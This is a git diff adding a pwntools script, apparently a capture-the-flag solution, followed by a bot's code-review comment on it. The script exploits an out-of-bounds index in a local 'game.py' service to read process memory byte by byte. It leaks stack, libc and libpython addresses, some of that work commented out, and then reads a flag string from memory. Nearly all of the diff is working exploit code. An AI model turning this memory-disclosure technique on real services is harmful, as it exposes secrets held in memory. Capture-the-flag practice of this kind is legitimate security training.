Diffstat (limited to 'meta/solve.py')
-rw-r--r--meta/solve.py68
1 files changed, 68 insertions, 0 deletions
diff --git a/meta/solve.py b/meta/solve.py
new file mode 100644
index 0000000..e1b8192
--- /dev/null
+++ b/meta/solve.py
@@ -0,0 +1,68 @@
+from pwn import *
+import psutil
+import time
+
+io = remote("localhost", 9090)
+if args.DEBUG:
+ time.sleep(1)
+ filter = lambda p : "game.py" in p.cmdline()
+ pid = [p.pid for p in psutil.process_iter() if filter(p)][0]
+ util.misc.run_in_new_terminal(f"sudo -E gdb --pid={pid}")
+ input()
+
+def leak(offset, unpack=True):
+ io.readuntil(b"Easy or Hard? ")
+ io.sendline(b"hard")
+
+ io.readuntil("Ready? ")
+ io.sendline(b"")
+
+ leak = []
+ for i in range(8):
+ io.readuntil(b"Index 1: ")
+ io.sendline(str(0).encode())
+
+ io.readuntil(b"Index 2: ")
+ if offset < 0:
+ io.sendline(str((1 << 64) + offset + i).encode())
+ else:
+ io.sendline(str(offset + i).encode())
+
+ line = io.readline()
+ leak.append(int(line.split(b" ")[1]))
+
+ if unpack:
+ return struct.unpack("<Q", bytes(leak))[0]
+ else:
+ return bytes(leak)
+
+# stack_leak = leak(-0x28)
+# numbers = stack_leak - 0x100
+# print("numbers", hex(numbers))
+#
+# libc_leak = leak(-0x18)
+# libc_clock_gettime = 0x00000000000cd6a0
+# libc_base = libc_leak - 29 - libc_clock_gettime
+# print("libc", hex(libc_base))
+#
+# libpython_base = libc_base + 0x1e7000
+# print("libpython", hex(libpython_base))
+#
+# pythonvars_leak = libpython_base + 0x390858
+# vars_base = leak(pythonvars_leak - numbers)
+# print("pythonvars", hex(vars_base))
+#
+# flag_var = vars_base + 0x7fd00
+# print("flag", hex(flag_var))
+
+#for i in range(10):
+# print(leak(flag_var + i * 8 - numbers, False))
+
+numbers = leak(-0x30)
+print(numbers)
+flagobj = leak(-0xb48)
+print(flagobj)
+flagstr = flagobj + 0x30
+
+for i in range(4):
+ print(leak(flagstr + i * 8 - numbers, False))
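Review bot: In the DEBUG branch near the top of the hunk, `[p.pid for p in psutil.process_iter() if filter(p)][0]` raises a bare IndexError when no `game.py` process is running, and `p.cmdline()` can raise `psutil.NoSuchProcess`/`psutil.ZombieProcess` for a process that exits mid-iteration, so the attach step dies with an unhelpful traceback; prefer `pid = next((p.pid for p in psutil.process_iter(["cmdline"]) if "game.py" in (p.info["cmdline"] or [])), None)` followed by `if pid is None: raise SystemExit("no game.py process found")`, which also removes the `filter` lambda that shadows the builtin. Inside `leak`, the local `leak = []` shadows the function's own name and `io.readuntil("Ready? ")` passes a str where every sibling call passes bytes; renaming the list to `raw` and writing `b"Ready? "` keeps the helper consistent. `leak` has no docstring: a one-line summary stating that `offset` is the value sent as `Index 2` (apparently relative to the `numbers` address, given `flagstr + i * 8 - numbers` in the final loop — confirm), that negative offsets are sent as their unsigned 64-bit form via `(1 << 64) + offset`, and that `unpack=False` returns the eight raw bytes would let a reader follow the hard-coded constants at the bottom of the file. The commented-out block between the helper and the final loop is dead code that belongs in a notes file rather than the script.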